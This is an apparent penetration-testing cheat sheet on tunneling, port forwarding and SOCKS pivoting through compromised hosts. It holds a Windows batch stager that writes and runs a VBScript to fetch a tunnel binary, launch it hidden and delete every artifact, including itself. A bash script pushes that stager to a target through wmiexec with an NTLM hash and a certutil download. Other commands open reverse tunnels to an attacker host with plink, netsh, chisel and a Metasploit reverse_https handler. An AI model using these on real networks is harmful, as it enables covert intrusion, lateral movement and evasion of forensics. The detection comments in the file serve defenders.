`` Tunneling
`` sshuttle
~$ sshuttle -r VAR_USERNAME@VAR_TARGET_HOST VAR_TARGET_CIDR
`` ssf
`` polipo.conf
# polipo here chains to the SOCKS5 listener on 127.0.0.1:8888 (presumably the
# ssf -F <port-socks> service configured further down this page) and exposes
# it as an HTTP proxy on 127.0.0.1:8881, for clients that only speak HTTP proxies.
socksParentProxy = "127.0.0.1:8888"
socksProxyType = socks5
# Loopback-only listener: nothing off-host can reach the HTTP proxy port.
proxyAddress = "127.0.0.1"
proxyPort = 8881
# NOTE(review): both paths start with "~" -- confirm polipo expands it; if not,
# a literal "~" directory is created relative to the working directory.
logFile = "~/var/log/polipo"
diskCacheRoot = "~/var/cache/polipo"
`` Local (ssf.json)
{
"ssf": {
"tls" : {
"ca_cert_path": "./certs/trusted/ca.crt",
"cert_path": "./certs/certificate.crt",
"key_path": "./certs/private.key",
"key_password": "VAR_PASSWORD",
"dh_path": "./certs/dh4096.pem",
"cipher_alg": "DHE-RSA-AES256-GCM-SHA384"
},
"services": {
"datagram_forwarder": { "enable": true },
"datagram_listener": { "enable": true, "gateway_ports": false },
"stream_forwarder": { "enable": true }, "stream_listener": { "enable": true, "gateway_ports": false },
"copy": { "enable": true },
"shell": { "enable": true, "path": "/bin/bash", "args": "" },
"socks": { "enable": true }
}
}
}
~$ ssfd -l VAR_ATTACKER_HOST -p 11111 -c ssf.json
`` Remote (ssf.json)
{"ssf":{"arguments":"-F 8888 -p 11111 VAR_ATTACKER_HOST -m 99999 -t 15","tls":{"key_password":"VAR_PASSWORD"}}}
`` Deployment (ssf.bat)
@echo off
REM ssf.bat <ip> <port-socks> <port-remote>
REM ssf.exe -F <port-socks> -p <port-remote> VAR_ATTACKER_HOST -m 99999
REM ssf.exe -F 8888 -p 11111 <ip> -m 99999
REM
REM Flow: change into this file's own directory, write wallpaper.vbs one echo
REM line at a time, run it with cscript, then delete the .vbs, the archive,
REM the generated ssf\config.json, ssf.b64 and this .bat itself.
REM Defender notes (everything below is visible in this file): the VBScript
REM fetches ssf-32.zip or ssf-64.zip over plain HTTP from %1 with an XMLHTTP /
REM WinHttp COM object, writes it to disk through ADODB.Stream, unpacks it with
REM Shell.Application CopyHere, writes the TLS key password into config.json,
REM and launches ssf.exe with window style 0 (hidden). A batch file that
REM generates and runs a .vbs from its own folder and then removes itself is a
REM strong detection signal on its own.
cd /D "%~dp0"
setlocal
set vbs="wallpaper.vbs"
REM Start from an empty file: the first echo truncates with >, the rest append with >>.
if exist %vbs% del /f /q %vbs%
>%vbs% echo Dim s_EnvArch, http, binary, fso, objShell, ZipFile, ShellScript
REM s_Arch ("32", "64" or "Fail") selects the archive name requested below.
>>%vbs% echo s_EnvArch = CreateObject("WScript.Shell").ExpandEnvironmentStrings("x86")
>>%vbs% echo If Err.Number = 0 Then
>>%vbs% echo Select Case s_EnvArch
>>%vbs% echo Case "x86"
>>%vbs% echo s_Arch = "32"
>>%vbs% echo Case "AMD64"
>>%vbs% echo s_Arch = "64"
>>%vbs% echo End Select
>>%vbs% echo Else
>>%vbs% echo s_Arch = "Fail"
>>%vbs% echo End If
>>%vbs% echo URL = "http://%1/ssf-" ^& s_Arch ^& ".zip"
>>%vbs% echo ZipFile = "ssf.zip"
>>%vbs% echo Wscript.Echo "Pulling " ^& URL ^& "..."
REM Several HTTP client COM objects are tried in turn; the download is unauthenticated plain HTTP.
>>%vbs% echo Set http = Nothing
>>%vbs% echo Set http = CreateObject("Microsoft.XMLHTTP")
>>%vbs% echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
>>%vbs% echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
>>%vbs% echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
>>%vbs% echo Set binary = createobject("Adodb.Stream")
>>%vbs% echo http.Open "GET", URL, False
>>%vbs% echo http.Send
>>%vbs% echo with binary
>>%vbs% echo .type = 1
>>%vbs% echo .open
>>%vbs% echo .write http.responseBody
>>%vbs% echo .savetofile ZipFile, 2
>>%vbs% echo end with
>>%vbs% echo Set http = Nothing
>>%vbs% echo Set binary = Nothing
REM Extraction uses the Shell.Application zip namespace, so no external unzip tool appears in telemetry.
>>%vbs% echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo Set objShell = CreateObject("Shell.Application")
>>%vbs% echo CurrentDirectory = fso.GetParentFolderName(WScript.ScriptFullName)
>>%vbs% echo PathSource = fso.BuildPath(CurrentDirectory, "ssf.zip")
>>%vbs% echo PathExtract = fso.BuildPath(CurrentDirectory, "ssf")
>>%vbs% echo Set ZipFile = objShell.NameSpace(PathSource).items
>>%vbs% echo WScript.Echo "Extracting..."
>>%vbs% echo For Each objItem in ZipFile
>>%vbs% echo WScript.Echo objItem.Name
>>%vbs% echo Next
>>%vbs% echo If fso.FolderExists(PathExtract) Then
>>%vbs% echo fso.DeleteFolder PathExtract
>>%vbs% echo End If
>>%vbs% echo fso.CreateFolder(PathExtract)
>>%vbs% echo objShell.Namespace(PathExtract).CopyHere(ZipFile)
>>%vbs% echo Set objShell = Nothing
>>%vbs% echo Set objShell = CreateObject("WScript.Shell")
>>%vbs% echo objShell.CurrentDirectory = fso.BuildPath(CurrentDirectory, "ssf")
REM config.json holds only the TLS key password; presumably ssf.exe reads it from
REM its working directory, which the line above sets to the ssf folder.
>>%vbs% echo Set objFile = fso.CreateTextFile("config.json", True)
>>%vbs% echo objFile.Write "{""ssf"": {""tls"": {""key_password"": ""VAR_PASSWORD""}}}"
>>%vbs% echo objFile.Close
REM %1 = server ip, %2 = socks port, %3 = remote port. Run's second argument 0 means a hidden window.
>>%vbs% echo execPath = "ssf.exe -F %2 -p %3 %1 -m 99999 -t 15"
>>%vbs% echo objShell.Run execPath, 0, False
>>%vbs% echo Set objShell = Nothing
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
>>%vbs% echo Set ZipFile = Nothing
REM Execute the generated script, then remove every artifact, this .bat included.
cscript //nologo %vbs%
del /f /q %vbs%
del /f /q ssf\config.json
del /f /q ssf.zip
del /f /q ssf.b64
del /f /q ssf.bat
`` Deployment (downloader)
#!/usr/bin/env bash
# Remote deployment of the ssf.bat stager shown above: every entry of CMDS is
# executed on IP_TARGET through impacket's wmiexec.py, authenticating with an
# NTLM hash instead of a password.
# Defender notes (from the commands below): certutil.exe -urlcache -split -f
# fetches ssf.b64 into %temp% and certutil -decode turns it back into ssf.bat;
# certutil acting as downloader/decoder is a widely monitored
# living-off-the-land pattern, as is command execution arriving over WMI.
# ssf.bat then receives the server ip and the two ports as %1 %2 %3
# (see its REM usage line in the Deployment section).
# All five values below are empty placeholders in this listing.
NTLM_HASH=
DOMAIN=
USERNAME=
# IP_SERVER serves ssf.b64 over HTTP and is also the host ssf.bat hands to ssf.exe as %1.
IP_SERVER=
IP_TARGET=
# Must match the -F <port-socks> / -p <port-remote> values used by ssf.bat.
PORT_SOCKS=8888
PORT_REMOTE=11111
declare -a CMDS=(
"certutil.exe -urlcache -split -f \"http://$IP_SERVER/ssf.b64\" %temp%\ssf.b64"
"certutil -decode %temp%\ssf.b64 %temp%\ssf.bat"
"%temp%\ssf.bat $IP_SERVER $PORT_SOCKS $PORT_REMOTE"
)
# NOTE(review): NTLM_HASH, DOMAIN, USERNAME and IP_TARGET are expanded unquoted
# on the wmiexec.py line, so a value containing whitespace would word-split.
for i in "${CMDS[@]}"
do
wmiexec.py -hashes $NTLM_HASH $DOMAIN/$USERNAME@$IP_TARGET "$i"
done
`` Port forwarding
`` tcpforward
~$ tcpforward -v -l 0.0.0.0:37999 -c localhost:3306
~$ tcpforward -v -l localhost:6666 -c VAR_ATTACKER_HOST:37999
`` Windows
`` netsh
~> netsh interface portproxy add v4tov4 listenport=37999 listenaddress=0.0.0.0 connectport=443 connectaddress=VAR_ATTACKER_HOST
`` plink.exe
~> plink -l VAR_USERNAME -pw VAR_PASSWORD -R 8889:127.0.0.1:3389 VAR_ATTACKER_HOST
`` nc
~$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe
`` Proxying
`` ncat
~$ ncat -lvkp 8080 -c "ncat --ssl VAR_TARGET_HOST 443"
`` socat
~$ socat tcp-listen:8080,fork tcp:VAR_TARGET_HOST:80
~$ socat tcp-listen:8080,fork openssl:VAR_TARGET_HOST:443,verify=0
~$ socat tcp-listen:445,reuseaddr,fork tcp:localhost:9445
~$ socat-ssl23 tcp-listen:8443,fork openssl:VAR_TARGET_HOST:443,verify=0
`` SOCKS
`` ssh
`` SOCKS over socat
~$ socat TCP-LISTEN:10022,fork SOCKS4:socks.VAR_TARGET_HOST:ssh-serv:22
~$ ssh -p 10022 loopback
`` a.VAR_TARGET_HOST -> b.VAR_TARGET_HOST -> c.VAR_TARGET_HOST -> d.VAR_TARGET_HOST -> Internet
a~$ ssh -2 -C -D 55557 -L 55556:127.0.0.1:55556 -L 55555:127.0.0.1:55555 [email protected]_TARGET_HOST
b~$ ssh -2 -C -D 55556 -L 55555:127.0.0.1:55555 [email protected]_TARGET_HOST
c~$ ssh -2 -C -D 55555 [email protected]_TARGET_HOST
`` SSH
~$ ssh -N -f -D 9000 username@VAR_TARGET_HOST
[ENTER] + [~C]
-D 1090
`` ncat
~$ ncat --proxy socks.VAR_TARGET_HOST:8000 --proxy-type socks4 VAR_TARGET_HOST 80
`` Firefox
network.proxy.socks_remote_dns = true
`` Metasploit
> use multi/handler
> set payload windows/meterpreter/reverse_https
> set lhost VAR_ATTACKER_HOST
> set lport VAR_ATTACKER_PORT
> set ExitOnSession false
> run -j
> use multi/manage/autoroute
> set session 1
> run
> use auxiliary/server/socks_proxy
> set version 4a
> set srvhost 127.0.0.1
> run -j
`` Chisel
-- On attacker machine
~$ ./chisel server -v -p VAR_ATTACKER_PORT --reverse
-- On victim machine
~$ ./chisel client -v VAR_ATTACKER_HOST:VAR_ATTACKER_PORT R:socks
~> chisel.exe client VAR_ATTACKER_HOST:VAR_ATTACKER_PORT R:socks